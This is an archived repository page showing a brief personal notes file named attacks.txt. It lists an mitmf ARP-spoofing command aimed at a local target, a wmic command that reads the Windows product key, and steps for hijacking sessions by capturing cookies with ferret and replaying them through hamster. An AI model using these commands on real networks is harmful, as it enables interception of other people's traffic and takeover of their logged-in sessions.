This repository has been archived on 2020-06-20. You can view files and clone it, but cannot push or open issues or pull requests.
Lists/attacks.txt

8 lines
477 B
Plaintext
Raw Normal View History

2018-11-03 19:01:33 +01:00
-Example usage of mitmf: sudo mitmf --arp --spoof --gateway 192.168.1.1 --target 192.168.1.10 -i wlan0
-To get the windows product key execute with admin privileges: wmic path softwarelicensingservice get OA3xOriginalProductKey
2018-11-04 16:56:34 +01:00
-Use mitmf or ettercap to start mitm then use ferret to capture cookies (ferret -i eth0)
use hamster to set session cookies and then in browser set the proxy settings to manual giving the address
provided by hamster and finally open that link